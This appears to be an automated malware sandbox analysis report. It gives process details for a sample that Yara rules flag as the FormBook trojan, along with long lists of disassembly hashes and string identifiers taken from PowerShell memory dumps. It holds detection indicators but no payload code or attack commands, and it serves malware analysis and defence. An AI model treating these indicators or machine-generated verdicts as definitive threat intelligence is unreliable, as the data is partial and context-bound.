                                          Target ID:15
                                          Start time:08:51:08
                                          Start date:05/10/2024
                                          Path:C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe"
                                          Imagebase:0x930000
                                          File size:140'800 bytes
                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2955372386.0000000002BD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.2955372386.0000000002BD0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                          Has exited:false

                                          Target ID:16
                                          Start time:08:51:20
                                          Start date:05/10/2024
                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                          Imagebase:0x7ff6bf500000
                                          File size:676'768 bytes
                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                            • Instruction ID: 0203feaf22d987ef88f93ae2c61385824405ec4ae6066d0648f290058174eb7d
                                            • Opcode Fuzzy Hash: 98d1f78f93cd958fdc3bde9049dfc151c803b2f160d996c9d1e7b4d329e8562c
                                            • Instruction Fuzzy Hash: DE324BB1F00229CFEB158F6984546EABBEAAF85310F14847AD909DF3D1DB32D845C7A1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                            • API String ID: 0-242022331
                                            • Opcode ID: cc6f75520df9086768c23c9039e2f08c2ed18c21a095086eb1fb2d410e532994
                                            • Instruction ID: 4a644f043786dc253dd432c8e4a9fe95574db104fc909d3f4146107aeb26d140
                                            • Opcode Fuzzy Hash: cc6f75520df9086768c23c9039e2f08c2ed18c21a095086eb1fb2d410e532994
                                            • Instruction Fuzzy Hash: 0E62A3B4A00219DFEB14CB58C955B9EBBB6BF84304F1084A9D9096F395CB31ED86CF91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (f+l$(f+l$(f+l$(f+l$(f+l$(f+l$4'^q$4'^q$4'^q$4'^q
                                            • API String ID: 0-4281883174
                                            • Opcode ID: e018da3077acb458ff8c27036ce0c36d1ee7924395f101d5283b2c7e3b5f7471
                                            • Instruction ID: 36bf0189fa7259667425e1f3428933d4e0b4825ecaacc8890f4b966faecc1eb7
                                            • Opcode Fuzzy Hash: e018da3077acb458ff8c27036ce0c36d1ee7924395f101d5283b2c7e3b5f7471
                                            • Instruction Fuzzy Hash: 2D6280B4B00218DFE714CB98C855E9ABBB6BF84308F14C069D909AF395CB72EC55CB91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$4'^q$84)l$84)l$tP^q$tP^q$$^q$$^q$$^q
                                            • API String ID: 0-2873740239
                                            • Opcode ID: fbbf67962f9bd54aefd2c181261dccd49181c6417aa1443c2862f00815d5558d
                                            • Instruction ID: bb250d07f9049c032b4089cac6f7c8d30dd4f0da1066011f29f1618a75ed4d44
                                            • Opcode Fuzzy Hash: fbbf67962f9bd54aefd2c181261dccd49181c6417aa1443c2862f00815d5558d
                                            • Instruction Fuzzy Hash: 37C139B0A093999FD7168B29C854A6ABFFAAF86210F19C4DBD448CF2D2CB31DC45C751
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (f+l$(f+l$4'^q$4'^q
                                            • API String ID: 0-2018738063
                                            • Opcode ID: dad2c90aee51a4743f8415c6c632ea3423dbb132ea261d07aef3f4d022b42d21
                                            • Instruction ID: a0546fc4f953e21e35745b9f73b1d3ab019b9f3eddd54c3c6d8a0b2b6b5ff9e6
                                            • Opcode Fuzzy Hash: dad2c90aee51a4743f8415c6c632ea3423dbb132ea261d07aef3f4d022b42d21
                                            • Instruction Fuzzy Hash: 30426DB4B10215DFE710CF98C855E9ABBB6BB88318F14C059D909AF395CB72EC56CB81
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (f+l$(f+l$4'^q$4'^q
                                            • API String ID: 0-2018738063
                                            • Opcode ID: b58c105e6f5b39c5b866b24d579c5e28f01b84236d14b5ccf36ac7af1b81a693
                                            • Instruction ID: c3559eac984a990db6065696a6e0276ea588246fb71c4440640c0be0910b207f
                                            • Opcode Fuzzy Hash: b58c105e6f5b39c5b866b24d579c5e28f01b84236d14b5ccf36ac7af1b81a693
                                            • Instruction Fuzzy Hash: 56F1E5B4A002199FE724DB68CD51FAEBBB3AB84344F1080A9D9096F395DB71DD818F91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2016250732.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_46b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Hbq$$^q$$^q
                                            • API String ID: 0-1611274095
                                            • Opcode ID: 6f355bb98992fd04d273955fe61eb9a9f8eeef2840272204e1c62219956af97d
                                            • Instruction ID: 341ce90525f99fb105bc875f2b0862c73650b487387e23adbe734b60369fd906
                                            • Opcode Fuzzy Hash: 6f355bb98992fd04d273955fe61eb9a9f8eeef2840272204e1c62219956af97d
                                            • Instruction Fuzzy Hash: 78225030B002148FDB25DF24C854AEEB7B6EF89704F1445A9D44AAB361DF35AE86CF90
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (f+l$4'^q$4'^q
                                            • API String ID: 0-2994860849
                                            • Opcode ID: ff42abcfb1c3322f670d74c0e4857ad06a61da7e9463e45bcfa35dba1bdfce40
                                            • Instruction ID: 592d5e453fa21bbd7a775ccef0933b6ef76968112124187dd5c96eae65503f8f
                                            • Opcode Fuzzy Hash: ff42abcfb1c3322f670d74c0e4857ad06a61da7e9463e45bcfa35dba1bdfce40
                                            • Instruction Fuzzy Hash: AE127CB4B10219DFE710CF98C895E9ABBB6BB84308F14C059D9096F395CB76EC56CB81
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$4'^q$$^q
                                            • API String ID: 0-953868773
                                            • Opcode ID: 830d224f777180cedb983574962dd1179e0dbe1b49c0fb2e19d5766750ada88e
                                            • Instruction ID: ca8766ce7c0519d90440b23de7746fba7ccdac4d9820e5553e57feeb073d2d0c
                                            • Opcode Fuzzy Hash: 830d224f777180cedb983574962dd1179e0dbe1b49c0fb2e19d5766750ada88e
                                            • Instruction Fuzzy Hash: D99180F0F043298FEB158B7885506AABBEA9F86200F1484BAD549DF3D1DA31DC85C791
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$4'^q$4'^q
                                            • API String ID: 0-1196845430
                                            • Opcode ID: e717a5b1395519fa0b73ea56b41bd130d67e12972d9ddeeabf88dd6b3d6d842d
                                            • Instruction ID: e220d5017a7699dfa6d93fc35a1f80040243b9114cf286e82c6d43c2abafd1f7
                                            • Opcode Fuzzy Hash: e717a5b1395519fa0b73ea56b41bd130d67e12972d9ddeeabf88dd6b3d6d842d
                                            • Instruction Fuzzy Hash: 84A190B4A102199FEB14CB54C541B9EBBB7AF88314F10C469E9097F395CB31EC85CB91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$4'^q$4'^q
                                            • API String ID: 0-1196845430
                                            • Opcode ID: 286fe8b14f557753901c939cfdce0b35bc0d20d8d543e38b05924404b19c55a5
                                            • Instruction ID: 502807cd64b3d98d49c7bd56e05ab6c302acffdf517ebf3fe16ace9d6182f63c
                                            • Opcode Fuzzy Hash: 286fe8b14f557753901c939cfdce0b35bc0d20d8d543e38b05924404b19c55a5
                                            • Instruction Fuzzy Hash: 1DA19FB4A002199FEB14CB54C541B9EBBBBAF88314F10C469E9097F395CB31EC86CB91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $^q$$^q$$^q
                                            • API String ID: 0-831282457
                                            • Opcode ID: 30e02cedad4fb8e047d767cb1e4f9d57e74210fee4b2b281c003f824e79e6110
                                            • Instruction ID: 3b3ba585583c4afb9006f11ef72ed81a8292186f467f5e2247f2bae08a87a074
                                            • Opcode Fuzzy Hash: 30e02cedad4fb8e047d767cb1e4f9d57e74210fee4b2b281c003f824e79e6110
                                            • Instruction Fuzzy Hash: 802149B17103AE9BFB34456A9C40B27B69E5BC0714F34842AE50DDB3C5CD76DC448322
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (f+l$(f+l
                                            • API String ID: 0-1421956851
                                            • Opcode ID: 6325a52275a36310ceef0632fec214ea01f0cfbf679bcda5385d246a51f188f0
                                            • Instruction ID: b6e329847f90babff2bb2053c5a5a80dd65c510c84a4df6191259f7f56a35be8
                                            • Opcode Fuzzy Hash: 6325a52275a36310ceef0632fec214ea01f0cfbf679bcda5385d246a51f188f0
                                            • Instruction Fuzzy Hash: 269196F4B002189FEB14DB58C945B9EBBA7AF88308F108468D9047F795CB76EC51CB91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $^q$$^q
                                            • API String ID: 0-355816377
                                            • Opcode ID: 55b50b591c74985fc43de85ad4dd8f360ba13cb778c5d1097154cb45df28b061
                                            • Instruction ID: f146e388425a77e0998f9261affeeca37d77b2a371df178c18f6ccb030014573
                                            • Opcode Fuzzy Hash: 55b50b591c74985fc43de85ad4dd8f360ba13cb778c5d1097154cb45df28b061
                                            • Instruction Fuzzy Hash: AD1136F13043ED6BFB3045264D40B677BAD4B81610F248027E948DB2D6C9398C84C323
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (f+l
                                            • API String ID: 0-988561221
                                            • Opcode ID: 9257475e44303eda608d3000270a9304f093561c98d39eb1c91bd905fc398529
                                            • Instruction ID: 7cb9ebf9bd9c45a5d4e4ffc9ddade8691738a7d6e901d9fe235b429fa25bf061
                                            • Opcode Fuzzy Hash: 9257475e44303eda608d3000270a9304f093561c98d39eb1c91bd905fc398529
                                            • Instruction Fuzzy Hash: FD91A5F4B00219AFEB14CB54C941B9EBBB6AF89308F148069D9087F791CB76EC51CB91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q
                                            • API String ID: 0-1614139903
                                            • Opcode ID: 6826f3f89a1de3701b24a8e32f0a6250d9c0193a07bfdcaaf42ca722f2e8c0b8
                                            • Instruction ID: 627bc0993331f44cdae173491154030846ba26ee68c8c92da10f3b3e58792fad
                                            • Opcode Fuzzy Hash: 6826f3f89a1de3701b24a8e32f0a6250d9c0193a07bfdcaaf42ca722f2e8c0b8
                                            • Instruction Fuzzy Hash: 404137F0F00326DFEB148F748680BEABBEEAF85240F1994A5C9489B391D731D881C791
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2016250732.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_46b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6f1038fbe50525175073faef88963be8f282661fea925e7426039040ae04f260
                                            • Instruction ID: 193caac2b1712a07533b9a055f4dd301af23fbf3ee0614c69bfa953922dac1b5
                                            • Opcode Fuzzy Hash: 6f1038fbe50525175073faef88963be8f282661fea925e7426039040ae04f260
                                            • Instruction Fuzzy Hash: 6BD12A74A00219AFDB15CF98D584ADDFBB2FF48310F248559E845AB366DB31ED82CB90
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2016250732.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_46b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dcceacc8e0b8faff2c317386bb6e037f7c417aa19dee77ea69f9b9afd128de7d
                                            • Instruction ID: c217861c934e294fed52983b5416b54752c0d55f27ad64f214ec3d685b4ef379
                                            • Opcode Fuzzy Hash: dcceacc8e0b8faff2c317386bb6e037f7c417aa19dee77ea69f9b9afd128de7d
                                            • Instruction Fuzzy Hash: 26D10574A00209AFDB05CF98D584AEDFBB2FF48310F258559E849AB365D731ED82CB90
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2016250732.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_46b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 29866b6b1641629a3cb95d60ad1e07de1c5fc6b64f883cbe10ae08ddcff72db7
                                            • Instruction ID: 3e098861587b5b1e3a53eb9a3386607550af491a9f69b62221fad59660442e18
                                            • Opcode Fuzzy Hash: 29866b6b1641629a3cb95d60ad1e07de1c5fc6b64f883cbe10ae08ddcff72db7
                                            • Instruction Fuzzy Hash: 55C1BE71B002089FDB14DFA4C994A9DBBB2FF85314F158568E546AF365EB34EC89CB80
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2016250732.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_46b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 022ec7e8e8bbc428fb4984b442b5e505d26bc6f45cb73bd6d8c53360b5102ff8
                                            • Instruction ID: 5692db7708ba7a4bdb076cf04ecc987c5309b6a307552561405ecea641d4f9d0
                                            • Opcode Fuzzy Hash: 022ec7e8e8bbc428fb4984b442b5e505d26bc6f45cb73bd6d8c53360b5102ff8
                                            • Instruction Fuzzy Hash: CCB15C71E002098FDB18CFA8D9857DEBBF2AF48314F148129D855E7364FB74A896CB91
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2016250732.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_46b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 18a57be68be711cbe627c22f48f9f5ed6ac46ff09c55c1c8c6f48e76dd8c8d90
                                            • Instruction ID: 053de7ea68d2e9f3838a70a07d3a18c6027027ca37b3ead78fcd15784f52a11e
                                            • Opcode Fuzzy Hash: 18a57be68be711cbe627c22f48f9f5ed6ac46ff09c55c1c8c6f48e76dd8c8d90
                                            • Instruction Fuzzy Hash: FFB11C70E002099FDB14CFA9DD857DEBBF1AF48314F148529E855EB364EB74A886CB81
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2016250732.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_46b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ed6b8660764467393a5ed354f99f6153eed09125e157d7a9ff59a1bd652c3323
                                            • Instruction ID: f254905bf87ff4a954321402b5daa376db8ca38481ec0121c32cc2d320cf26e0
                                            • Opcode Fuzzy Hash: ed6b8660764467393a5ed354f99f6153eed09125e157d7a9ff59a1bd652c3323
                                            • Instruction Fuzzy Hash: A7816D34A01244DFCB15EF64C4949ADBBF6FF89310F1884A9E4459B361E735ED85CB50
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2016250732.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_46b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a438f588b01f454b87e59b0b771bee94093fc7051c3f8b657578d305063517e2
                                            • Instruction ID: 4392f10797bca54d1c3ab07f3328edf46d6cd48051d552ec06d6556073b641e7
                                            • Opcode Fuzzy Hash: a438f588b01f454b87e59b0b771bee94093fc7051c3f8b657578d305063517e2
                                            • Instruction Fuzzy Hash: 1E71B170A00245CFCB14DF68C480A9DBBF2FF85310F14856AD455EB791EB75AC4ACB80
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2016250732.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_46b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 208f09abca6ed0bf1f5d09adb904dcd4af8bdf802dc4605a8857a2bd32a657df
                                            • Instruction ID: becac0774c33230b88a4fa4a741eaca7601ac14ff94d2de40fca1fa2a16af5ff
                                            • Opcode Fuzzy Hash: 208f09abca6ed0bf1f5d09adb904dcd4af8bdf802dc4605a8857a2bd32a657df
                                            • Instruction Fuzzy Hash: 42714C70A002489FCB14DFA4D494AADBBF6FF88304F148469D555AB390EB35AC8ACB90
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2016250732.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_46b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c531fda3bda4c481e5a2f37861662581063c4ad432ec8ec12410ea00a7db9af5
                                            • Instruction ID: 3069a12a029b7aa5b1d876177f6d5008d2824da3a05c5dc04ca5c086abaeae9e
                                            • Opcode Fuzzy Hash: c531fda3bda4c481e5a2f37861662581063c4ad432ec8ec12410ea00a7db9af5
                                            • Instruction Fuzzy Hash: 8E716F70E00249DFDB18CFA9C8957DEBBF2AF88314F148129D445E7364EB74A886CB81
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2016250732.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_46b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5497b1ffbcb5f8a1f9056c517f4f0ac362737b8aa79389f081ccc99de963872e
                                            • Instruction ID: 84012e140e80fda3963324e6229a6e0b91debc5407580fd41f0da207a34fcc53
                                            • Opcode Fuzzy Hash: 5497b1ffbcb5f8a1f9056c517f4f0ac362737b8aa79389f081ccc99de963872e
                                            • Instruction Fuzzy Hash: 74715C70E00249DFDB18CFA8C9957DEBBF1AF88314F148129E455E7364EB74A886CB81
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 15abf64c2e235c392aa4d251f1db0340af51ec5bd2802eaa11a44a7e87cc9874
                                            • Instruction ID: e2bed16baf27669cd2c56b86b7a751ec3cd29efbc2d2ea28f3ed7a14d77fd2b7
                                            • Opcode Fuzzy Hash: 15abf64c2e235c392aa4d251f1db0340af51ec5bd2802eaa11a44a7e87cc9874
                                            • Instruction Fuzzy Hash: 9941BDF1B002358BEB1597B84415ABEBF9A9FC1314B14C4AAC509AF7D2CE32D80587A2
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2016250732.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_46b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5f6320ae548d0c12de5246e4c53909fc65dbaaf6178286fdfdf0b484b1d47e91
                                            • Instruction ID: 4767080d73bd655552bdcc607ae43fc232aadc14299c238e970ac5a776f0b7ee
                                            • Opcode Fuzzy Hash: 5f6320ae548d0c12de5246e4c53909fc65dbaaf6178286fdfdf0b484b1d47e91
                                            • Instruction Fuzzy Hash: 79419E31B002009FDB14AB24C854AAEBBF6FF89710F09446CE542EB7A0DF34AC49DB90
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2016250732.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_46b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 01b21060d594a66211c16c1c28a113273c4615e96188d3cbc18dbe06685f6c50
                                            • Instruction ID: 86833febec39d6815d9fbaa9c8a096a3428706216b1e2fac6aa809568a8b08e4
                                            • Opcode Fuzzy Hash: 01b21060d594a66211c16c1c28a113273c4615e96188d3cbc18dbe06685f6c50
                                            • Instruction Fuzzy Hash: 35416D70A00249DFCB18DFA9C89479DBBF2FF84314F158469D446AB394EB74AC89CB90
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5ffbb5b99e2e29bf461b7c19dbdd94cd207de5509a1ea45ecae068f01682ad5a
                                            • Instruction ID: adacb3c85ec34c70dd736e1466bda87d683bd6b732acf64f56975ae8a701ff59
                                            • Opcode Fuzzy Hash: 5ffbb5b99e2e29bf461b7c19dbdd94cd207de5509a1ea45ecae068f01682ad5a
                                            • Instruction Fuzzy Hash: DC31E3B4B40218AFE7049768C855FAFBB67ABD5344F208428E9057F3D5CF769C428B91
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2016250732.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_46b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dc31fd436e3c27bece598b758a18e7090d5b8352892fd1fb78ef96cff7a4773b
                                            • Instruction ID: 3e156525d5101a4d4eb33e4663181bb96245ff0ca417af355f5cb77c4aa79f49
                                            • Opcode Fuzzy Hash: dc31fd436e3c27bece598b758a18e7090d5b8352892fd1fb78ef96cff7a4773b
                                            • Instruction Fuzzy Hash: 0C31B674A093959FC702DF6CD8A4AEABFF0EF4A214B0580D6D484DB363D624E845CBA5
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3c40e0b05ff61a5521a18875100fa425a83e2f7b08e8a5b6d0ef2ffa606c3b1d
                                            • Instruction ID: c544e947732768ce9cc06af863a01ec9d2363a0e57001a0caaa0f2407ff61b42
                                            • Opcode Fuzzy Hash: 3c40e0b05ff61a5521a18875100fa425a83e2f7b08e8a5b6d0ef2ffa606c3b1d
                                            • Instruction Fuzzy Hash: 162161B17103256BE728597AC895B3BB6DD9BC4710F348439A40DDB3C5CDB5D8528361
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2016250732.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_46b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 58324d582f599958ce2149dbf174aea8c7c4afa8393b6c2114dc0b69affbd466
                                            • Instruction ID: be45976f62dc1af3f2ab9d493c660e372874e57473659921559ef831277706e6
                                            • Opcode Fuzzy Hash: 58324d582f599958ce2149dbf174aea8c7c4afa8393b6c2114dc0b69affbd466
                                            • Instruction Fuzzy Hash: DF314930B012688FCB25DB24C9546EEB7B2BF89304F1544E9D509AB356DF35AE86CF81
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6f9e1ee29493927236069e7043c6f3a2ae8a84cb80b840d8ed39b87fe731731d
                                            • Instruction ID: ee6e30bd333dca01e6526c683e6fa3f4f681f086e72832261694acbe8f661f8b
                                            • Opcode Fuzzy Hash: 6f9e1ee29493927236069e7043c6f3a2ae8a84cb80b840d8ed39b87fe731731d
                                            • Instruction Fuzzy Hash: E9219EB130436977E7280A7AC8547777BDD5F86700F388026E44CDB2C6C5B49896C361
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2016250732.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_46b0000_powershell.jbxd
